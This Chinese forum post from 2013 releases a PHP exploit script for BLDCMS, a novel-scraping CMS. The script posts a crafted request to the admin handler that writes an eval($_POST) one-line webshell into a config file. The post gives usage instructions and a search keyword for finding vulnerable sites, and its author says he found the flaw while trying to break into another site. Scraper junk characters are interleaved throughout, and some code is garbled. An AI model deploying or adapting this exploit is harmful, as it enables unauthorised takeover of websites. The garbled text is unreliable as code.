之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
( W% L$ |/ b; Y, v* q% o6 o$ [) W# W8 `% h
, T/ a. l* ?- G
话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了
/ d. O2 Z% C0 ?; V1 D# ? * k& Q; p9 D5 n1 n! f7 S5 z
既然都有人发了 我就把我之前写好的EXP放出来吧$ e7 `1 U, d3 s2 o* w7 z! ]0 j
7 U- j/ o+ ~" o, a. L8 u2 H. t7 Kview source print?01.php;">
' \) r$ n1 J/ v02.<!--?php# W! G, A# s+ D
03.echo "-------------------------------------------------------------------( C" z, F( D9 ]+ {/ y: D
04.
% |3 ]$ G4 S) C9 G6 S05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP
- g3 K9 x! b+ m' J0 W$ E6 B" s06. ( J$ J( Z$ ~, m; f3 R
07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun4 c( B+ B/ i' C7 J2 y: z4 `6 v
08. , f. f$ N( C: ^+ Z& b1 U4 I
09.QQ:981009941\r\n 2013.3.21\r\n
% C J: B$ o- f" H) z6 `10.
/ H# j# S$ Q8 g8 f% k11.
: z r7 T/ y# Y# F5 ]12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码$ `- ?# w" O) G! P& `
13.
1 c# b6 ~( _: y: g7 }2 H0 A14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------
5 G5 k- N2 L+ y: `* s1 I3 N) ~15. / y; Y& G- b8 Z* a9 q
16.--------------------------------------------------------------------\r\n";
& a, K, ]0 @. g( e [% O0 x17.$url=$argv[1];+ M+ z+ p- e w1 k3 |: u7 B) {0 C; F
18.$dir=$argv[2];
8 f+ a; N$ K) m4 I+ X19.$pass=$argv[3];
' @9 l4 Q+ r# U( G20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
0 ~! ^# o7 {( [5 N0 k21.if (emptyempty($pass)||emptyempty($url))
& N6 _3 k2 Y' b) P/ N) Z: x22.{exit("请输入参数");}0 Q1 u* E- B% |8 \
23.else, r/ j7 m( J; e! y f# n. V
24.{
" i3 K& `* `0 D6 x25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev6 n6 j \$ U n; E- A8 v/ ^
26. . k2 x, u8 {) O% c* T! v" `" N
27.al;+ p* X& k8 O3 C) I8 S
28.$length = strlen($fuckdata);1 \/ w2 z: _+ q5 d. E. ]# @8 H+ h
29.function getshell($url,$pass)
: ]! d/ A; g6 |/ q30.{
R0 m2 w; K# X% u; Q5 d31.global $url,$dir,$pass,$eval,$length,$fuckdata;; v Y1 a: t* B9 Q' ~
32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";6 F' ~, A) J- m5 x/ ~7 P3 I( I
33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";/ H3 e: G' S1 [% N. t9 [1 g" S
34.$header .= "User-Agent: MSIE\r\n";1 Z0 r& X9 L+ U. O0 A% Y& h
35.$header .= "Host:".$url."\r\n";* A. h9 z* t4 X) C1 T
36.$header .= "Content-Length: ".$length."\r\n";/ O- r' z5 v. F G* [
37.$header .= "Connection: Close\r\n";: p2 b% w9 l2 Y2 }$ {
38.$header .="\r\n";
( U) U J) O9 S, @% j6 w. a39.$header .= $fuckdata."\r\n\r\n";
4 d* \$ H/ z: i, g9 b2 ]5 o2 |40.$fp = fsockopen($url, 80,$errno,$errstr,15);! C. e8 L' n1 a7 C! j- c, U
41.if (!$fp): y. K/ z& `5 U) W- h
42.{
]& r2 o6 s6 d- J43.exit ("利用失败:请检查指定目标是否能正常打开");+ P$ ~8 t6 g$ @
44.}& ?% T% [1 `* A
45.else{ if (!fputs($fp,$header)), l @/ p+ c+ E4 M5 t7 [
46.{exit ("利用失败");}# R3 h* I" w( q5 |, r/ _7 o: A
47.else4 Z- O8 u4 j4 J t
48.{
; T9 `% W( f6 G# m, ~9 l3 s3 x49.$receive = '';, y* w. L+ j0 B0 U2 A( \& Q% k# f( q3 t9 K
50.while (!feof($fp)) {) v0 F" q1 k: ?6 U) D: `; N
51.$receive .= @fgets($fp, 1000);& e" r% B( y/ ?- g( g( T
52.}' j' x: q9 b3 b$ I0 k
53.@fclose($fp);
4 `+ E" \( H e54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标
% N5 {0 D- g# u% n2 O55.
: C# S0 p a/ k/ }& Z$ O( d4 r8 K6 K56.GPC是否=off)";
+ i# R' \. h9 |6 o7 p/ n57.}}
8 L* S8 q E4 s" A) ^) w58.}* F) A0 ?( ^% ?
59.}
' T1 H' ^# F0 g, q- }60.getshell($url,$pass);+ t' \+ F5 S2 k
61.?-->
: H8 M7 e& Q& |0 R
" }. C: h0 s6 s
" H8 }% U9 q* b- U
]2 g6 ]. q" c, l* U1 Hby 数据流
+ I9 M( _. T! ~ |
发表于 2013-3-26 20:49:10
收藏
分享
支持
反对